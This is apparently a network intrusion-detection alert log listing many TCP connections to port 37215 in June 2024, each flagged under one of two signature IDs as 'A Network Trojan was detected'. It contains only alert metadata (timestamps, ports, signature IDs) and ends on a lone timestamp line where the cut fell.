              Timestamp:06/13/24-21:32:38.321551
              SID:2835222
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251770
              SID:2835222
              Source Port:54644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025943
              SID:2829579
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301606
              SID:2835222
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788753
              SID:2835222
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942264
              SID:2829579
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677946
              SID:2835222
              Source Port:38104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192235
              SID:2829579
              Source Port:50464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503232
              SID:2829579
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417683
              SID:2835222
              Source Port:57282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297398
              SID:2835222
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213320
              SID:2829579
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415623
              SID:2829579
              Source Port:52320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476113
              SID:2835222
              Source Port:54134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154116
              SID:2829579
              Source Port:46704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484975
              SID:2829579
              Source Port:37708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565335
              SID:2829579
              Source Port:49142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509660
              SID:2835222
              Source Port:45434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754621
              SID:2835222
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569090
              SID:2835222
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785984
              SID:2829579
              Source Port:37286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191811
              SID:2829579
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161120
              SID:2835222
              Source Port:57490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175314
              SID:2835222
              Source Port:40034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401627
              SID:2835222
              Source Port:51842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014438
              SID:2829579
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243418
              SID:2835222
              Source Port:57414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677044
              SID:2835222
              Source Port:48766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300884
              SID:2835222
              Source Port:59256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246840
              SID:2829579
              Source Port:59286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789232
              SID:2835222
              Source Port:37050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694302
              SID:2829579
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974332
              SID:2835222
              Source Port:50132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752588
              SID:2835222
              Source Port:58798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546254
              SID:2835222
              Source Port:40656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455634
              SID:2829579
              Source Port:58256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176532
              SID:2829579
              Source Port:55026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885734
              SID:2829579
              Source Port:56040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042663
              SID:2829579
              Source Port:52130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452357
              SID:2829579
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553929
              SID:2829579
              Source Port:41918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136428
              SID:2835222
              Source Port:52918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057906
              SID:2835222
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028104
              SID:2835222
              Source Port:34350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697434
              SID:2829579
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110728
              SID:2835222
              Source Port:38364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822565
              SID:2829579
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756777
              SID:2829579
              Source Port:43658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074313
              SID:2829579
              Source Port:54082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524532
              SID:2829579
              Source Port:35654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611985
              SID:2829579
              Source Port:47506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636213
              SID:2829579
              Source Port:45974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370369
              SID:2835222
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346072
              SID:2829579
              Source Port:51056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632899
              SID:2835222
              Source Port:60854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835030
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507688
              SID:2835222
              Source Port:45064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153711
              SID:2835222
              Source Port:57568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993569
              SID:2829579
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153391
              SID:2835222
              Source Port:53736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404051
              SID:2829579
              Source Port:54902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729243
              SID:2835222
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566102
              SID:2835222
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477527
              SID:2829579
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422463
              SID:2829579
              Source Port:41826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378079
              SID:2829579
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869450
              SID:2835222
              Source Port:42204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057520
              SID:2829579
              Source Port:50336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248858
              SID:2835222
              Source Port:60556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077066
              SID:2835222
              Source Port:60150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227465
              SID:2829579
              Source Port:57494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308837
              SID:2829579
              Source Port:36896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487621
              SID:2835222
              Source Port:43624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309357
              SID:2829579
              Source Port:60692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941491
              SID:2829579
              Source Port:51612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192314
              SID:2835222
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841120
              SID:2835222
              Source Port:45208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606821
              SID:2829579
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800923
              SID:2829579
              Source Port:45298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408318
              SID:2829579
              Source Port:47326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156473
              SID:2829579
              Source Port:36766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452067
              SID:2835222
              Source Port:40938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347701
              SID:2835222
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216765
              SID:2835222
              Source Port:58294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525923
              SID:2835222
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573238
              SID:2835222
              Source Port:50276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040837
              SID:2835222
              Source Port:37702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726758
              SID:2829579
              Source Port:34786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016590
              SID:2835222
              Source Port:35830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941572
              SID:2829579
              Source Port:60388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609210
              SID:2835222
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028908
              SID:2829579
              Source Port:33196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129847
              SID:2835222
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564781
              SID:2835222
              Source Port:37304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988200
              SID:2835222
              Source Port:50486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211751
              SID:2829579
              Source Port:43724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176943
              SID:2835222
              Source Port:43494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376157
              SID:2829579
              Source Port:59368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320541
              SID:2829579
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407345
              SID:2835222
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247385
              SID:2829579
              Source Port:51272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079250
              SID:2835222
              Source Port:38012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730181
              SID:2835222
              Source Port:33478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129956
              SID:2835222
              Source Port:44244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457077
              SID:2829579
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418239
              SID:2835222
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195612
              SID:2835222
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614703
              SID:2835222
              Source Port:41700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707144
              SID:2829579
              Source Port:48694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176815
              SID:2835222
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474618
              SID:2835222
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.725585
              SID:2829579
              Source Port:52604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089657
              SID:2835222
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096446
              SID:2829579
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090431
              SID:2835222
              Source Port:51436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027294
              SID:2835222
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909680
              SID:2829579
              Source Port:47548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800504
              SID:2835222
              Source Port:59190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276120
              SID:2835222
              Source Port:42508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198591
              SID:2829579
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424487
              SID:2829579
              Source Port:35748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725695
              SID:2835222
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754902
              SID:2835222
              Source Port:54746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242294
              SID:2829579
              Source Port:42290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572970
              SID:2829579
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277587
              SID:2835222
              Source Port:33976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157536
              SID:2835222
              Source Port:49832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752788
              SID:2835222
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408826
              SID:2835222
              Source Port:34668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974399
              SID:2829579
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222763
              SID:2829579
              Source Port:56472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545597
              SID:2829579
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306220
              SID:2835222
              Source Port:53484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910923
              SID:2829579
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222717
              SID:2835222
              Source Port:54816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551288
              SID:2835222
              Source Port:32824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164860
              SID:2829579
              Source Port:38306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678662
              SID:2829579
              Source Port:55960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572079
              SID:2829579
              Source Port:57970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174612
              SID:2835222
              Source Port:38312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805117
              SID:2835222
              Source Port:47680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048725
              SID:2835222
              Source Port:34114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888594
              SID:2835222
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246346
              SID:2829579
              Source Port:57768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437363
              SID:2829579
              Source Port:44400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028275
              SID:2835222
              Source Port:35822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085249
              SID:2829579
              Source Port:56296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078446
              SID:2835222
              Source Port:52566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670993
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731657
              SID:2829579
              Source Port:42534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173304
              SID:2835222
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836633
              SID:2829579
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551530
              SID:2835222
              Source Port:53798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660605
              SID:2835222
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079073
              SID:2835222
              Source Port:52410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709940
              SID:2835222
              Source Port:44134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839225
              SID:2829579
              Source Port:34196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013558
              SID:2835222
              Source Port:41662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358180
              SID:2835222
              Source Port:38462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440696
              SID:2835222
              Source Port:48020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611256
              SID:2835222
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421389
              SID:2835222
              Source Port:45520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248309
              SID:2835222
              Source Port:59504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633892
              SID:2835222
              Source Port:34998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969968
              SID:2835222
              Source Port:40524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439850
              SID:2835222
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453468
              SID:2829579
              Source Port:44738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708780
              SID:2835222
              Source Port:42570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318797
              SID:2829579
              Source Port:35696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273813
              SID:2835222
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409626
              SID:2829579
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885634
              SID:2829579
              Source Port:38910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553019
              SID:2829579
              Source Port:55514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378115
              SID:2829579
              Source Port:39112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524729
              SID:2835222
              Source Port:59176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132824
              SID:2835222
              Source Port:42012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198113
              SID:2829579
              Source Port:59226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093175
              SID:2835222
              Source Port:49658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137854
              SID:2835222
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221229
              SID:2835222
              Source Port:58940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659752
              SID:2835222
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123531
              SID:2829579
              Source Port:39348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155006
              SID:2835222
              Source Port:50984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756351
              SID:2835222
              Source Port:41708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758132
              SID:2829579
              Source Port:35218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378398
              SID:2829579
              Source Port:43992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502991
              SID:2835222
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613211
              SID:2835222
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101755
              SID:2829579
              Source Port:49504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229637
              SID:2835222
              Source Port:53188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221680
              SID:2835222
              Source Port:57280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506556
              SID:2829579
              Source Port:35442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552930
              SID:2835222
              Source Port:54534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212948
              SID:2835222
              Source Port:41378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418616
              SID:2829579
              Source Port:48880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506728
              SID:2835222
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214131
              SID:2835222
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437902
